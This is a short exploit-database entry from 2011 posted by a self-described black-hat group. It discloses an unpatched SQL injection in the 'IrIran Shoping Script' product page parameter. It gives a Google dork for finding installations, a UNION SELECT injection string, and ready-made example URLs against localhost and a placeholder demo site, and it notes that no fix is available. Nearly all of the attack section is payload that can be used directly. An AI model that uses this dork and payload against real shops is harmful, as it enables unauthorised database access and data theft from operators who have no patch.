IrIran Shoping Script SQL Injection Vulnerability

2011-03-30 11:15:16

==========================================
IrIran Shoping Script SQL Injection Vulnerability
==========================================

[~]######################################### InformatioN
#############################################[~]

[~] Title : IrIran Shoping Script SQL Injection Vulnerability
[~] Author : Net.Edit0r
[~] Vendor or Software Link : http://www.iriran.net
[~] Email : [email protected]
[~] Data : 2011-03-29
[~] Google dork: "Powered by: IRIran.net"
[~] Category: [Webapps]
[~] Tested on: [Linux /php]

[~]######################################### ExploiT
#############################################[~]

[~] Vulnerable File :

http://127.0.0.1/products/page.php?id=[SQL]

[~] ExploiT :

-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--

[~] Example :

http://127.0.0.1/products/page.php?id=-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--

[~] Demo :

http://site.com/products/page.php?id=-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--


[~]######################################### ThankS To ...
############################################[~]

[~] Black Hat Group Member :

Net.Edit0r & DarkCoder & fronk & Amir-MaGic & H3x & Milad.C0nn3ct0r #BHG

[~] IRANIAN Young HackerZ # Persian Gulf

[~]######################################### FinisH :D
#############################################[~]################[~]

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.